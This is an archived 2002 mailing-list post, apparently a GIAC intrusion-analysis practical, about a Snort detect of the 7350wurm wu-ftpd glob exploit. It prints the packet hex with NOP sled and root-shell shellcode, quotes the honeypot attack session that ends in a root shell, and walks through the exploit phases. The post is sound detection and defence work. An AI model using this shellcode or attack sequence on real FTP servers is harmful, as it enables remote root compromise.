[prev in list] [next in list] [prev in thread] [next in thread]
List: intrusions
Subject: Re: LOGS: GIAC GCIA Version 3.3 Practical Detect#2 (Rietveld)
From: "Ronny Rietveld" <ronny () plcrietveld ! demon ! nl>
Date: 2002-11-26 15:04:30
[Download RAW message or body]
Oliver,
After spending more time on this detect I have to admit there was a lot more in to \
it. Initially I concentrated on the globbing commans, but the anwser in the exploit \
code of the first packet. I have included more details on the padding x30's and xeb \
x0c /x90 noops. Hope I have correctly interpreted the information as this coding is \
not one of my hobbies.. yet ;-)
Regards,
Ronny
[**] SHELLCODE x86 EB OC NOOP [**]
07/07-00:51:37.964488 134.126.133.162:2103 -> 46.5.180.133:21
TCP TTL:51 TOS:0x0 ID:10390 IpLen:20 DgmLen:560 DF
***AP*** Seq: 0xBB7E1B4C Ack: 0x8599DDFF Win: 0x16D0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 30355649 6749585
43 57 44 20 30 30 30 30 30 30 30 30 30 30 30 30 CWD 000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 F0 FC 40 31 07 08 98 5F 08 08 EB 0C 0000..@1..._....
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C 90 90 90 90 90 90 90 90 90 90 90 90 ................
31 DB 43 B8 0B 74 51 0B 2D 01 01 01 01 50 89 E1 1.C..tQ.-....P..
6A 04 58 89 C2 CD 80 EB 0E 31 DB F7 E3 FE CA 59 j.X......1.....Y
6A 03 58 CD 80 EB 05 E8 ED 0A CA 59 6A 03 58 CD j.X........Yj.X.
80 EB 05 E8 ED FF FF FF FF FF FF 0A ............
[**] FTP wu-ftp bad file completion attempt { [**]
07/07-00:51:38.004488 134.126.133.162:2103 -> 46.5.180.133:21
TCP TTL:51 TOS:0x0 ID:10391 IpLen:20 DgmLen:68 DF
***AP*** Seq: 0xBB7E1D48 Ack: 0x8599E008 Win: 0x1920 TcpLen: 32
TCP Options (3) => NOP NOP TS: 30355653 6749588
43 57 44 20 7E 2F 7B 2E 2C 2E 2C 2E 2C 2E 7D 0A CWD ~/{.,.,.,.}.
[**] FTP wu-ftp bad file completion attempt { [**]
07/07-00:51:38.164488 134.126.133.162:2103 -> 46.5.180.133:21
TCP TTL:51 TOS:0x0 ID:10399 IpLen:20 DgmLen:59 DF
***AP*** Seq: 0xBB7E1DB0 Ack: 0x8599E13F Win: 0x1920 TcpLen: 32
TCP Options (3) => NOP NOP TS: 30355670 6749605
FD A5 43 57 44 20 7E 7B 0A CWD ~{.
< Cut for brevity; see Appendix Detect 1>
(1) Source of Trace:
The source is log file (2002.6.6), downloaded from http://www.incidents.org/logs/Raw. \
This file was generated by Snort NIDS with an unknown ruleset
(2) Detect was generated by:
This detect is generated by Snort 1.9.0 in NIDS mode, using default signature files. \
The snort.conf file was changed to include all rule files. Snort rule applying to the \
first packet (shellcode.rules): alert ip $EXTERNAL_NET any -> $HOME_NET \
$SHELLCODE_PORTS (msg:"SHELLCODE x86 EB OC NOOP"; content:"|EB 0C EB 0C EB 0C EB 0C \
EB 0C EB 0C EB 0C EB 0C|"; classtype:shellcode-detect; sid:1424; rev:4;) Snort rule \
applying to the second and third packet (ftp.rules): alert tcp $EXTERNAL_NET any -> \
$HOME_NET 21 (msg:"FTP wu-ftp bad file completion attempt {"; \
flow:to_server,established; content:"~"; content:"{"; reference:cve,CVE-2001-0550; \
reference:cve,CAN-2001-0886; reference:bugtraq,3581; classtype:misc-attack; sid:1378; \
rev:9;)
(3) Probability the source address was spoofed:
Very low. The TCP three-way handshake was completed before the attacker could launch \
this attack. This also implies that a FTP daemon is running on all victims, while \
there is no evidence that reconnaissance took place from the source address in the \
two months preceding this attack.
(4) Description of attack:
The attacker sends a serie of packets to each victim. Each of the victims is targeted \
two times. When you put all packets in chronological order, you can see there is a \
clear pattern in time delay and identification number (ID) increase.
Victims Time Delay Identification numbers
46.5.180.133 00:51:37 00:00:00 10390,10391, 10399
46.5.180.151 00:51:59 00:00:22 43646, 43467, 43655
46.5.180.153 00:52:21 00:00:22 42562, 42563, 42571
46.5.180.135 00:52:44 00:00:23 64492, 64493, 64501
46.5.180.153 00:53:06 00:00:22 32920, 32921, 32929
46.5.180.151 00:53:28 00:00:22 24913, 24914, 24922
46.5.180.134 00:53:50 00:00:22 56491, 56492, 56500
46.5.180.133 00:54:12 00:00:22 65102, 65103, 65111
46.5.180.135 00:54:34 00:00:22 29029, 29030, 29038
46.5.180.134 00:54:56 00:00:22 48729, 48730, 48738
I believe the attacker used the 7350wurm code to attack wuftp on x86 platforms:
0xEB 0x0C jump-based NOOPs, 0x90 NOOPs and the exploit code from the first packet are \
the first part of phase two of 7350wurm. Note that the trailing 0xCA 0x59 0x6A 0x03 \
0x58 0x80 0xEB 0x05 0xE8 0xED appears twice in the first packet, but is defined only \
once in the 7350wurm code. a.. The command 'CWD ~/{.,.,.,.}' from the second packet \
is the second part of phase two of 7350wurm and is send back-to-back with the first \
packet. This explains that the identification numbers increases by one. b.. The \
command 'CWD ~{' from the third packet is part of phase three of 7350wurm and clears \
the path for the real exploit code. Between this command and the former, 7350wurm \
sends four CWD and three RNFR commands. This is explains of the increase of \
identification numbers by eight. There are multiple versions floating around the \
Internet. This detect is referenced with version 0.2.2, downloaded from Packet Storm \
Security. The latest version can be downloaded from Teso Security.
(5) Attack mechanism:
In his write up Rating the Enemy: "How to identify the enemy", Toby Miller describes \
an attack on his RedHat 7.2 honey pot, logged one month before this attack. Although \
he does not mention the exploit code used, it is obvious a trace from 7350wurm. \
Excerpts from Toby Miller's write up are shown indent.
The attacker logs in (using Ethereal):
220 alligator12 FTP server (Version wu-2.6.1-18) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS mozilla@
230 Guest login ok, access restrictions apply.
In auto mode, the exploit code is able to recognize WU-FTP versions 2.4.2 to 2.6.1 \
running on Caldera, Debian, Immunix, Mandrake, RedHat, Slackware and SuSe Linux. With \
the -t option the attacker can select the version of choice from a list.
Username ftp and password mozilla@ are both defaults. With the -p option the attacker \
can set an arbitrary password. With the -u option the attacker should be able to set \
a username, but from the 7350wurm code it appears the username is fixed to 'h0ra'.
Attacker begins trying to rename:
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
Phase one of the 7350wurm code: According to the 7350wurm code: 'Fill all small \
memory gaps in wuftpd malloc space. Do this by sending RNFR (ReName FRom) requests, \
which cause a memory leak in wuftpd.' Although I have found not any reference to \
memory leak vulnerability in the RNFR command of WU-FTP, the RNFR should be \
immediately followed by RNTO (ReName TO). Since these are not send by the attacker \
they may hold small portions of memory.
Attacker begins to glob:
CWD 0000000000000000000000000000(cut for publication)
CWD ~/{.,.,.,.}
250 CWD command successful.
CWD .
250 CWD command successful.
RNFR ././././././././.
350 File exists, ready for destination name
CWD 735073
550 735073: No such file or directory.
CWD 73507
550 73507: No such file or directory.
CWD 7350é
550 7350é: No such file or directory.
RNFR .
350 File exists, ready for destination name
RNFR ./././././././.
350 File exists, ready for destination name
Phase two of the 7350wurm code: The two commands in read are packets one and two \
from this detect. The first packet exploits a buffer overflow vulnerability. First \
part of the datagram is padded with 0x30 bytes. This may be done to evade IDS \
detection, but is not a NOOP and may cause a crash when used to overflow a buffer.
NOOPs are used as a placeholder to put exploit code in a position where it is \
executed in case of a buffer overflow. There are a number of bytes or combinations of \
bytes that can act as NOOPs. All have in common that when executed contents of memory \
will not change, hence the name NO-OPeration. In this datagram NOOPs start with \
repetitive 0xEB 0x0C bytes (marked blue). When the return address hits 0xEB, it \
instructs the host to jump with an offset of 0x0C bytes. There it could hit the next \
jump-based NOOP, or hit the 0x90-padded area (marked green). These common NOOPs \
instruct the host to do nothing and slide to the next byte. Without this area there \
is a good chance the last jump-based NOOP will end up at some point in the exploit \
code (marked red).
According to the 7350wurm code this exploit code include three commands:
write (1, "\nsP\n", 4)
read (0, ncode, 0xff)
jmp ncode
In other words it writes 'sP' (0x7350), reads returned bytes and jumps to that \
point. This may look insignificant, but these two characters will ultimately be \
decisive whether the real exploit code is sent to the victim.
The second packet is a CWD command using globbing with an unusual pattern. Although \
it looks similar, it is not compliant with CVE-2001-0550 or CVE-2001-0886. The first \
paper does not include '/', while the second paper explicitly states the glob pattern \
ends with '{'. Unfortunately I was unable to find more information on this specific \
command. Attacker gets what he wants:
CWD ~{
sP
3Û÷ã°F3ÉÍ?jT<Ü°'±íÍ?°=Í?R±_h/Dâø<Ü°=Í?XjTj(XÍ?j
XTRhn/shh//bi?ãRS?áÍ?áÍ?unset HISTFILE;id;uname -a;
uid=0(root) gid=0(root) groups=50(ftp)
Linux alligator12 2.4.7-10 #1 Thu Sep 6 17:21:28 EDT 2001 i586 unknown
Phase three of the 7350wurm code: Packet three from this detect pops up. This is \
the well-known exploit of the glibc library, which allows the attacker to run the \
real exploit code. CVE-2001-0550 and CVE-2001-0886 cover this vulnerability. The \
7350wurm code expects 'sP' to be returned by the globbing exploit or the root attempt \
will fail. Since 7350wurm knows where 'sP' was located in memory it is sufficient to \
send the real exploit code without padding with NOOPs. The exploit code includes \
three parts: it sets the real and effective user for the current process to 0 (root) \
with setreuid(0,0), breaks chroot and execute /bin/sh to start the root shell. Last \
command string send by 7350wurm are 'unset HISTFILE' to hides traces of the attack \
from history, 'id' to return the userid, groupid and group membership and 'uname -a' \
to get information on the hostname, Linux kernel version and -date and processor \
architecture. After a successful exploit the attacker 'owns' the victim and will \
most likely install a backdoor for future access. To conclude this section; the \
7350wurm code does not appear to have the ability to scan networks for vulnerable \
hosts. With the 22 seconds intervals in mind, it is quite certain the attacker used \
an external script to launch the attack. (6) Correlations:
A search on the Internet on the source IP address (134.126.133.162) or it host name \
(ip133-162.lab.jmu.edu) does not return more information of this attack or other \
attacks by this host. The source IP address is registered in the DShield.org IP Info \
database. A total of 90080 records against 90078 targets are held against this source \
IP address. All dated on 06-07-2002. Information retrieved 24-10-2002)
A lookup in the ARIN Whois database shows that the source IP address belongs to a \
class-B network registered to James Madison University. Information from the Internet \
Storm Center shows that the 134.126.0.0/16 network has a total of 812 registered \
hosts, operating from 94 sub-networks. A total of 99992 records against 94263 targets \
are held against this network. (Information retrieved 20-11-2002)
The 7350wurm code used to reference the various parts of the attack with can be \
downloaded from Packet Storm Security. According to the information on this site the \
7350wurm code was found abandoned on a honey pot. Packet Storm Security, \
'0205-exploits/7350wurm.c'
URL: http://packetstormsecurity.org/0205-exploits/7350wurm.c (11-20-2002)
In reply to a post on SecuirtyFocus, Gerardo Richarte describes the function of the \
first exploit code, the real exploit code and the link of the 'sP' string with both. \
Richarte Gerardo, 'Re: Strange version of a standard WUFTP overflow ' SecurityFocus \
(07-02-2002)
URL: http://archives.neohapsis.com/archives/sf/honeypots/2002-q3/0000.html \
(11-20-2002)
Miller, Toby. 'Rating the Enemy: "How to identify the enemy"'
URL: http://www.incidents.org/detect/rating.html (11-10-2002)
(7) Evidence of active targeting:
Yes. None of the logs show reconnaissance from this attacker. However, it is \
possible that the attacker has done reconnaissance but did not use oos packets or \
tripped any threshold of Snort's preprocessors. Nevertheless, the attacker picked \
five victims that run a FTP daemon. (8) Severity:
Area Rate
Explanation
Criticality
5
One of the victims is the main FTP server.
Lethality
5
When successful, the attacker can remotely execute arbitrary code.
System countermeasures
1 The log does not rule out the possibility the victims were compromised.
Network countermeasures
1
The attacker successfully made connections with the five victims.
Severity = (criticality + lethality) - (sys. countermeasures + net. \
countermeasures). Severity = (5 + 5) - (1 + 1) = 8
(9) Defensive recommendation:
Update WU-FTP daemons to version 2.6.2 or higher. It is likely the attacker will \
change files of install a backdoor for future access. To counteract on this, a \
regular checkup on critical files with a checksum-based tool like Tripwire should be \
considered. Public FTP servers should be considered insecure and be placed in the \
DMZ of a firewall. Internal hosts should not trust public FTP servers. TCP wrapper or \
similar software can provide additional security on non-public FTP servers. Disabling \
anonymous access will prevent 'anonymous' attacks at the penalty of sending \
clear-text passwords over an unsafe public network.
Snort did not pickup all packets of the 7350wurm attack or logged a more general \
alert. This is bad, since assumptions have to be made to classify this attack. Add \
this rule to Snort to correctly detect first distinctive packet from 7350wurm version \
0.2.2 and log the next hundred packets from the source IP address. This should give \
the analyst the opportunity to conclude whether or not the root attempt was \
successful. Please, note that the rule has to be included before EB OC NOOP rule: \
alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP 7350wurm v0.2.2"; \
flow:to_server,established,nostream; content:"CWD "; nocase; content:"|31 DB 43 B8 0B \
74 51 0B 2D 01 01 01 01 50 89 E1|"; dsize: > 200; tag: host, 100, packets, src; \
classtype: attempted-admin; sid:1000001; rev:1;)
(10) Multiple choice test question:
What is the intention of someone when sending this command: CWD ~{
A: List contents of current directory.
B: execute arbitrary commands
C: Information gathering
D: Cause a denial of service
Correct answer: B
CVE-2001-550: 'wu-ftpd 2.6.1 allows remote attackers to execute arbitrary commands \
via a "~{" argument to commands such as CWD, which is not properly handled by the \
glob function (ftpglob).'
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic